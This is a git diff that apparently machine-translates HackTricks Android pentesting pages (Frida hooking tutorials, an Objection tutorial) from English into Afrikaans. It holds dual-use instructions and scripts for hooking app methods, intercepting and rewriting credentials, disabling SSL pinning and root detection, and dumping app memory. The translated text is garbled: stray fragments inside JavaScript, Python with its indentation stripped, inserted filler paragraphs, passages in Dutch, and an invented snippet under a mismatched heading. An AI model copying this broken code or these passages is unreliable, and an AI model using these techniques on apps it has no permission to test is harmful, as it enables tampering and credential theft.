x); +var ret = this.fun(my_string); +console.log("Return value: " + ret); +console.log("*") +return ret; +}; +//Find an instance of the class and call "secret" function. +Java.choose("com.example.a11x256.frida_test.my_activity", { +onMatch: function (instance) { +console.log(tring, and the it has"Found instance: " + instance); +console.log("Result of secret func: " + instance.secret()); +}, +onComplete: function () { } +}); }); ``` - -You can see that to create a String first is has referenced the class _java.lang.String_ and then it has created a _$new_ object of that class with a String as content. This is the correct way to create a new object of a class. But, in this case, you could just pass to `this.fun()` any String like: `this.fun("hey there!")` +Jy kan sien dat om 'n String te skep, verwys dit eers na die klas _java.lang.String_ en skep dan 'n _$new_ objek van daardie klas met 'n String as inhoud. Dit is die korrekte manier om 'n nuwe objek van 'n klas te skep. Maar in hierdie geval kan jy net enige String aan `this.fun()` deurgee, soos: `this.fun("hallo daar!")` ### Python - ```python //loader.py import frida @@ -92,21 +89,19 @@ raw_input() ``` python loader.py ``` - -## Part 3 +## Deel 3 ### Python -Now you are going to see how to send commands to the hooked app via Python to call function: - +Nou gaan jy sien hoe om bevele na die gehaakte app te stuur deur middel van Python om 'n funksie te roep: ```python //loader.py import time import frida def my_message_handler(message, payload): - print message - print payload +print message +print payload device = frida.get_usb_device() @@ -115,90 +110,86 @@ device.resume(pid) time.sleep(1) # Without it Java.perform silently fails session = device.attach(pid) with open("s3.js") as f: - script = session.create_script(f.read()) +script = session.create_script(f.read()) script.on("message", my_message_handler) script.load() command = "" while 1 == 1: - command = raw_input("Enter command:\n1: Exit\n2: Call secret function\n3: Hook Secret\nchoice:") - if command == "1": - break - elif command == "2": - script.exports.callsecretfunction() - elif command == "3": - script.exports.hooksecretfunction() +command = raw_input("Enter command:\n1: Exit\n2: Call secret function\n3: Hook Secret\nchoice:") +if command == "1": +break +elif command == "2": +script.exports.callsecretfunction() +elif command == "3": +script.exports.hooksecretfunction() ``` +Die bevel "**1**" sal **afsluit**, die bevel "**2**" sal 'n **voorkoms van die klas vind en die private funksie** _**secret()**_ aanroep, en die bevel "**3**" sal die funksie _**secret()**_ **hook** sodat dit 'n **verskillende string** teruggee. -The command "**1**" will **exit**, the command "**2**" will find and **instance of the class and call the private function** _**secret()**_ and command "**3**" will **hook** the function _**secret()**_ so it **return** a **different string**. - -The, if you call "**2**" you will get the **real secret**, but if you call "**3**" and then "**2**" you will get the **fake secret**. +Dus, as jy "**2**" aanroep, sal jy die **werklike geheim** kry, maar as jy "**3**" en dan "**2**" aanroep, sal jy die **vals geheim** kry. ### JS - ```javascript console.log("Script loaded successfully "); var instances_array = []; function callSecretFun() { - Java.perform(function () { - if (instances_array.length == 0) { // if array is empty - Java.choose("com.example.a11x256.frida_test.my_activity", { - onMatch: function (instance) { - console.log("Found instance: " + instance); - instances_array.push(instance) - console.log("Result of secret func: " + instance.secret()); - }, - onComplete: function () { } +Java.perform(function () { +if (instances_array.length == 0) { // if array is empty +Java.choose("com.example.a11x256.frida_test.my_activity", { +onMatch: function (instance) { +console.log("Found instance: " + instance); +instances_array.push(instance) +console.log("Result of secret func: " + instance.secret()); +}, +onComplete: function () { } - }); - } - else {//else if the array has some values - console.log("Result of secret func: " + instances_array[0].secret()); - } +}); +} +else {//else if the array has some values +console.log("Result of secret func: " + instances_array[0].secret()); +} - }); +}); } function hookSecret() { - Java.perform(function () { - var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); - var string_class = Java.use("java.lang.String"); - my_class.secret.overload().implementation = function(){ - var my_string = string_class.$new("TE ENGANNNNEEE"); - return my_string; - } - }); +Java.perform(function () { +var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); +var string_class = Java.use("java.lang.String"); +my_class.secret.overload().implementation = function(){ +var my_string = string_class.$new("TE ENGANNNNEEE"); +return my_string; +} +}); } rpc.exports = { - callsecretfunction: callSecretFun, - hooksecretfunction: hookSecret +callsecretfunction: callSecretFun, +hooksecretfunction: hookSecret }; ``` +## Deel 4 -## Part 4 - -Here you will see how to make **Python and JS interact** using JSONs objects. JS use the `send()` function to send data to the python cliente, and Python uses `post()` functions to send data to ths JS script. The **JS will block the execution** until is receives s response from Python. +Hier sal jy sien hoe om **Python en JS te laat interaksie** deur gebruik te maak van JSON-voorwerpe. JS gebruik die `send()`-funksie om data na die Python-kliënt te stuur, en Python gebruik die `post()`-funksies om data na die JS-skrip te stuur. Die **JS sal die uitvoering blokkeer** totdat dit 'n antwoord van Python ontvang. ### Python - ```python //loader.py import time import frida def my_message_handler(message, payload): - print message - print payload - if message["type"] == "send": - print message["payload"] - data = message["payload"].split(":")[1].strip() - print 'message:', message - data = data.decode("base64") - user, pw = data.split(":") - data = ("admin" + ":" + pw).encode("base64") - print "encoded data:", data - script.post({"my_data": data}) # send JSON object - print "Modified data sent" +print message +print payload +if message["type"] == "send": +print message["payload"] +data = message["payload"].split(":")[1].strip() +print 'message:', message +data = data.decode("base64") +user, pw = data.split(":") +data = ("admin" + ":" + pw).encode("base64") +print "encoded data:", data +script.post({"my_data": data}) # send JSON object +print "Modified data sent" device = frida.get_usb_device() @@ -207,49 +198,54 @@ device.resume(pid) time.sleep(1) session = device.attach(pid) with open("s4.js") as f: - script = session.create_script(f.read()) +script = session.create_script(f.read()) script.on("message", my_message_handler) # register the message handler script.load() raw_input() ``` - ### JS +JavaScript (JS) is 'n programmeertaal wat gebruik word om interaktiewe webblaaie te skep. Dit word ook gebruik om mobiele toepassings, webtoepassings en selfs servers te ontwikkel. JS is 'n kernkomponent van die web en word deur alle moderne webblaaie ondersteun. + +JS kan gebruik word om verskeie funksies uit te voer, soos die manipulasie van HTML-elemente, die hantering van gebeurtenisse, die kommunikasie met 'n bediener en die skep van animasies. Dit is 'n veelsydige taal wat deur ontwikkelaars gebruik word om interaktiewe en dinamiese webblaaie te skep. + +In die konteks van hakwerk kan JS ook gebruik word om sekuriteitslekke in webtoepassings bloot te lê. Deur JS te manipuleer, kan 'n aanvaller toegang verkry tot sensitiewe inligting, soos gebruikersname en wagwoorde, of selfs die uitvoering van skadelike kodes bewerkstellig. + +Dit is belangrik vir hakkers om 'n goeie begrip van JS te hê, aangesien dit 'n kritieke taal is wat dikwels gebruik word in webtoepassings. Deur JS te verstaan en te manipuleer, kan 'n hacker suksesvolle aanvalle uitvoer en sekuriteitslekke uitbuit. ```javascript console.log("Script loaded successfully "); Java.perform(function () { - var tv_class = Java.use("android.widget.TextView"); - tv_class.setText.overload('java.lang.CharSequence').implementation = function (x) { - var string_to_send = x.toString(); - var string_to_recv = ""; - send(string_to_send); // send data to python code - recv(function (received_json_object) { - string_to_recv = received_json_object.my_data; - }).wait(); //block execution till the message is received - console.log("Final string_to_recv: "+ string_to_recv) - return this.setText(string_to_recv); - } +var tv_class = Java.use("android.widget.TextView"); +tv_class.setText.overload('java.lang.CharSequence').implementation = function (x) { +var string_to_send = x.toString(); +var string_to_recv = ""; +send(string_to_send); // send data to python code +recv(function (received_json_object) { +string_to_recv = received_json_object.my_data; +}).wait(); //block execution till the message is received +console.log("Final string_to_recv: "+ string_to_recv) +return this.setText(string_to_recv); +} }); ``` - -There is a part 5 that I am not going to explain because there isn't anything new. But if you want to read it is here: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/) +Daar is 'n deel 5 wat ek nie gaan verduidelik nie omdat daar niks nuuts is nie. Maar as jy wil lees, is dit hier: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in **hacking loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md index 343659db6..6e404e467 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md @@ -1,312 +1,321 @@ -# Objection Tutorial +# Objection Tutoriaal
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## **Introduction** +## **Inleiding** **objection - Runtime Mobile Exploration** -**[Objection](https://github.com/sensepost/objection)** is a runtime mobile exploration toolkit, powered by [Frida](https://www.frida.re). It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device. +**[Objection](https://github.com/sensepost/objection)** is 'n runtime mobiele verkenningstoolkit, aangedryf deur [Frida](https://www.frida.re). Dit is ontwikkel met die doel om te help om mobiele toepassings en hul sekuriteitsposisie te assesseer sonder die nodigheid van 'n jailbroken of rooted mobiele toestel. -**Note:** This is not some form of jailbreak / root bypass. By using `objection`, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing. +**Nota:** Dit is nie 'n vorm van jailbreak / root-omseil nie. Deur `objection` te gebruik, word jy steeds beperk deur al die beperkings wat deur die toepaslike sandboks wat jy in die gesig staar, opgelê word. -### Resume +### Hervat -The **goal** of **objection** is let the user call the **main actions that offers Frida**. **Otherwise**, the user will need to create a **single script for every application** that he wants to test. +Die **doel** van **objection** is om die gebruiker die **hoofaksies wat Frida bied**, te laat oproep. **Andersins** sal die gebruiker 'n **enkele skrips vir elke toepassing** wat hy wil toets, moet skep. -## Tutorial +## Tutoriaal -For this tutorial I am going to use the APK that you can download here: +Vir hierdie tutoriaal gaan ek die APK gebruik wat jy hier kan aflaai: {% file src="../../../.gitbook/assets/app-release.zip" %} -Or from its [original repository ](https://github.com/asvid/FridaApp)(download app-release.apk) - -### Installation +Of vanaf sy [oorspronklike bewaarplek](https://github.com/asvid/FridaApp)(laai app-release.apk af) +### Installasie ```bash pip3 install objection ``` +### Verbinding -### Connection - -Make a **regular ADB conection** and **start** the **frida** server in the device (and check that frida is working in both the client and the server). - -If you are using a **rooted device** it is needed to select the application that you want to test inside the _**--gadget**_ option. in this case: +Maak 'n **gewone ADB-verbinding** en **begin** die **frida**-bediener op die toestel (en kontroleer dat frida in beide die kliënt en die bediener werk). +As jy 'n **geroote toestel** gebruik, moet jy die toepassing wat jy wil toets, kies binne die _**--gadget**_ opsie. in hierdie geval: ```bash frida-ps -Uai objection --gadget asvid.github.io.fridaapp explore ``` +### Basiese Aksies -### Basic Actions +Nie alle moontlike bevele van objections sal in hierdie handleiding gelys word nie, slegs diegene wat ek as meer nuttig beskou het. -Not all possible commands of objections are going to be listed in this tutorial, only the ones that I have found more useful. - -#### Environment - -Some interesting information (like passwords or paths) could be find inside the environment. +#### Omgewing +Sommige interessante inligting (soos wagwoorde of paaie) kan binne die omgewing gevind word. ```bash env ``` - ![](<../../../.gitbook/assets/image (64).png>) -#### Frida Information - +#### Frida Inligting ```bash frida ``` - ![](<../../../.gitbook/assets/image (65).png>) -#### Upload/Download - +#### Oplaai/Aflaai ```bash file download [] file upload [] ``` +#### Voer frida-skrip in -#### Import frida script +```javascript +Java.perform(function() { + // Your code here +}); +``` +#### Hooking a method ```bash import ``` - #### SSLPinning +SSLPinning is 'n tegniek wat gebruik word om die vertroue in die SSL-sertifikate van 'n Android-toepassing te versterk. Dit verhoed dat 'n aanvaller 'n vals sertifikaat gebruik om kommunikasie tussen die toepassing en die bediener te onderskep of te manipuleer. SSLPinning kan gebruik word om die veiligheid van 'n toepassing te verhoog deur die risiko van man-in-die-middel-aanvalle te verminder. + +Objection bied 'n handige funksie aan om SSLPinning te omseil. Dit maak gebruik van die Frida-raamwerk om die SSL-sertifikaatverifikasieproses in die toepassing te onderskep en te manipuleer. Hierdie tegniek maak dit moontlik om 'n vals sertifikaat te gebruik sonder dat die toepassing dit besef. + +Om SSLPinning met Objection te omseil, moet jy die volgende stappe volg: + +1. Installeer Objection en die nodige afhanklikhede. +2. Begin die Frida-server op die doeltoestel. +3. Verbind Objection met die toepassing wat jy wil ondersoek. +4. Gebruik die `sslpinning disable`-bevel om SSLPinning te omseil. + +Met hierdie tegniek kan jy die SSLPinning-meganisme van 'n Android-toepassing omseil en die kommunikasie tussen die toepassing en die bediener onderskep en manipuleer. Dit kan nuttig wees vir pentesters en ontwikkelaars om die veiligheid van hul toepassings te evalueer en te verbeter. ```bash android sslpinning disable #Attempts to disable SSL Pinning on Android devices. ``` +#### Root opsporing -#### Root detection +Root-detectie is een belangrijk aspect van Android-app pentesting. Het verwijst naar het proces van het identificeren van of een Android-apparaat is geroot of niet. Een geroot apparaat kan de beveiligingsmaatregelen van een app omzeilen en mogelijk ongeautoriseerde toegang tot gevoelige gegevens mogelijk maken. +Er zijn verschillende technieken die kunnen worden gebruikt om root-detectie uit te voeren, zoals het controleren van de aanwezigheid van bekende root-bestanden, het controleren van de aanwezigheid van root-apps of het controleren van de status van de SELinux-beveiligingsfunctie. + +Het is belangrijk om root-detectie uit te voeren tijdens het pentesten van een Android-app, omdat het helpt bij het identificeren van mogelijke beveiligingslekken en het nemen van de juiste maatregelen om deze te verhelpen. ```bash android root disable #Attempts to disable root detection on Android devices. android root simulate #Attempts to simulate a rooted Android environment. ``` +#### Uitvoeringsopdrag -#### Exec Command +The `exec` command in Objection allows you to execute shell commands on the target Android device. This can be useful for performing various actions during a mobile penetration test. +To use the `exec` command, you need to have a Frida session established with the target application. Once you have the session, you can run shell commands by using the following syntax: + +``` +objection> exec +``` + +Replace `` with the shell command you want to execute. For example, if you want to list the files in the current directory, you can use the `ls` command: + +``` +objection> exec ls +``` + +The output of the command will be displayed in the Objection console. You can use this command to perform tasks such as exploring the file system, checking the device's network configuration, or executing other shell commands to gather information during your mobile penetration test. + +It's important to note that the `exec` command runs the shell command on the target device, so be cautious when executing commands that may have unintended consequences. Always ensure that you have the necessary permissions and authorization to perform the actions you intend to take. ```bash android shell_exec whoami ``` - -#### Screenshots - +#### Skermskote ```bash android ui screenshot /tmp/screenshot android ui FLAG_SECURE false #This may enable you to take screenshots using the hardware keys ``` +### Statische analise gemaak Dinamies -### Static analysis made Dynamic +In 'n werklike toepassing moet ons al die inligting wat in hierdie gedeelte ontdek is, ken voordat ons objection gebruik, dankie aan **statische analise**. In elk geval kan jy dalk **iets nuuts sien** hier, aangesien jy slegs 'n volledige lys van klasse, metodes en uitgevoerde objekte sal hê. -In a real application we should know all of the information discovered in this part before using objection thanks to **static analysis**. Anyway, this way maybe you can see **something new** as here you will only have a complete list of classes, methods and exported objects. - -This is also usefull if somehow you are **unable to get some readable source code** of the app. - -#### List activities, receivers and services +Dit is ook nuttig as jy op een of ander manier **nie toegang tot leesbare bronkode** van die app kan kry nie. +#### Lys aktiwiteite, ontvangers en dienste ```bash android hooking list activities ``` - ![](<../../../.gitbook/assets/image (78).png>) - ```bash android hooking list services android hooking list receivers ``` +Frida sal 'n fout lewer as daar geen aktiwiteit gevind word -Frida will launch an error if none is found - -#### Getting current activity - +#### Kry huidige aktiwiteit ```bash android hooking get current_activity ``` +#### Soek Klasses -![](<../../../.gitbook/assets/image (73) (1).png>) - -#### Search Classes - -Lets start looking for classes inside our application - +Laten ons begin om vir klasse binne ons toepassing te soek ```bash android hooking search classes asvid.github.io.fridaapp ``` - ![](<../../../.gitbook/assets/image (69).png>) -#### Search Methods of a class - -Now lets extract the methods inside the class _MainActivity:_ +#### Soekmetodes van 'n klas +Nou laat ons die metodes binne die klas _MainActivity_ onttrek: ```bash android hooking search methods asvid.github.io.fridaapp MainActivity ``` - ![](<../../../.gitbook/assets/image (70) (1).png>) -#### List declared Methods of a class with their parameters - -Lets figure out wich parameters does the methods of the class need: +#### Lys gedeclareerde Metodes van 'n klas met hul parameters +Laten ons uitvind watter parameters die metodes van die klas benodig: ```bash android hooking list class_methods asvid.github.io.fridaapp.MainActivity ``` - ![](<../../../.gitbook/assets/image (79).png>) -#### List classes - -You could also list all the classes that were loaded inside the current applicatoin: +#### Lys klasse +Jy kan ook 'n lys van al die klasse wat gelaai is binne die huidige toepassing lys: ```bash android hooking list classes #List all loaded classes, As the target application gets usedmore, this command will return more classes. ``` +Dit is baie nuttig as jy die metode van 'n klas wil **hook en jy ken net die naam van die klas**. Jy kan hierdie funksie gebruik om **te soek watter module die klas besit** en dan sy metode te hook. -This is very useful if you want to **hook the method of a class and you only know the name of the class**. You coul use this function to **search which module owns the class** and then hook its method. +### Hooking is maklik -### Hooking being easy - -#### Hooking (watching) a method - -From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) of the application we know that the **function** _**sum()**_ **from** _**MainActivity**_ is being run **every second**. Lets try to **dump all possible information** each time the function is called (arguments, return value and backtrace): +#### Hooking (kyk) 'n metode +Vanuit die [bronkode](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) van die toepassing weet ons dat die **funksie** _**sum()**_ **vanaf** _**MainActivity**_ elke sekonde uitgevoer word. Laat ons probeer om **alle moontlike inligting** elke keer as die funksie geroep word te dump (argumente, terugkeerwaarde en backtrace): ```bash android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --dump-args --dump-backtrace --dump-return ``` - ![](<../../../.gitbook/assets/image (71).png>) -#### Hooking (watching) an entire class - -Actually I find all the methods of the class MainActivity really interesting, lets **hook them all**. Be careful, this could **crash** an application. +#### Hooking (watching) 'n hele klas +Eintlik vind ek al die metodes van die klas MainActivity baie interessant, laat ons **hulle almal hook**. Wees versigtig, dit kan 'n toepassing **crash**. ```bash android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --dump-return ``` - -If you play with the application while the class is hooked you will see when **each function is being called**, its **arguments** and the **return** value. +As jy speel met die aansoek terwyl die klas gehook is, sal jy sien wanneer **elke funksie geroep word**, sy **argumente** en die **terugkeerwaarde**. ![](<../../../.gitbook/assets/image (72).png>) -#### Changing boolean return value of a function +#### Verander die booleaanse terugkeerwaarde van 'n funksie -From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**: +Vanuit die bronkode kan jy sien dat die funksie _checkPin_ 'n _String_ as argument kry en 'n _boolean_ teruggee. Laat ons die funksie **altyd waar** maak: ![](<../../../.gitbook/assets/image (74).png>) -Now, If you write anything in the text box for the PIN code you will see tat anything is valid: +Nou, as jy iets in die teksboks vir die PIN-kode skryf, sal jy sien dat enigiets geldig is: ![](<../../../.gitbook/assets/image (77).png>) -### Class instances - -Search for and print **live instances of a specific Java class**, specified by a fully qualified class name. Out is the result of an attempt at getting a string value for a discovered objection which would typically **contain property values for the object**. +### Klasinstansies +Soek na en druk **lewende instansies van 'n spesifieke Java-klas** af, gespesifiseer deur 'n volledig gekwalifiseerde klasnaam. Out is die resultaat van 'n poging om 'n stringwaarde vir 'n ontdekte beswaar te kry wat tipies **eiendomswaardes vir die objek** sou bevat. ``` android heap print_instances ``` - ![](<../../../.gitbook/assets/image (80).png>) ### Keystore/Intents -You can play with the keystore and intents using: - +Jy kan speel met die keystore en intents deur gebruik te maak van: ```bash android keystore list android intents launch_activity android intent launch_service ``` +#### Uitleg -### Memory +Die `dump`-bevel word gebruik om die inhoud van die geheue van 'n Android-toepassing te onttrek. Hierdie bevel kan gebruik word om sensitiewe inligting soos wagwoorde, sleutels en ander geheime te onthul. -#### Dump +#### Gebruik +Om die geheue van 'n Android-toepassing te dump, gebruik die volgende bevel: + +```plaintext +dump +``` + +Hier is 'n voorbeeld van hoe om die geheue van 'n toepassing met die klassenaam `com.example.app` te dump: + +```plaintext +dump com.example.app +``` + +Die uitset van die `dump`-bevel sal die inhoud van die geheue van die toepassing wees. Dit kan gebruik word om sensitiewe inligting te ondersoek en te analiseer. ```bash memory dump all #Dump all memory memory dump from_base #Dump a part ``` - -#### List - +#### Lys ```bash memory list modules ``` - ![](<../../../.gitbook/assets/image (66).png>) -At the bottom os the list you can see frida: +Aan die onderkant van die lys kan jy frida sien: ![](<../../../.gitbook/assets/image (67).png>) -Lets checks what is frida exporting: +Laat ons kyk wat frida uitvoer: ![](<../../../.gitbook/assets/image (68).png>) -#### Search/Write - -You can alse search and write inside memory with objection: +#### Soek/Skryf +Jy kan ook soek en skryf binne die geheue met objection: ```bash memory search "" (--string) (--offsets-only) memory write "
" "" (--string) ``` - ### SQLite -You cals can use the command `sqlite` to interact with sqlite databases. - -### Exit +Jy kan die opdrag `sqlite` gebruik om met sqlite databasisse te kommunikeer. +### Uitgang ```bash exit ``` +## Wat ek mis in Objection -## What I miss in Objection - -* The hooking methods sometimes crashes the application (this is also because of Frida). -* You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions. -* There isn't a shortcut (like the one for sslpinnin) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used. +* Die hakmetodes laat soms die toepassing afkraak (dit is ook as gevolg van Frida). +* Jy kan nie die instansies van die klasse gebruik om funksies van die instansie te roep nie. En jy kan nie nuwe instansies van klasse skep en dit gebruik om funksies te roep nie. +* Daar is nie 'n kortpad (soos die een vir sslpinnin) om al die algemene kriptografiese metodes wat deur die toepassing gebruik word, te hak om gekripteerde teks, plain teks, sleutels, IV's en gebruikte algoritmes te sien nie. -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers!** Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hakwerk van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md index 2a136b929..c5cc36658 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md @@ -1,151 +1,147 @@ -# Frida Tutorial 3 +# Frida Tutoriaal 3
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks 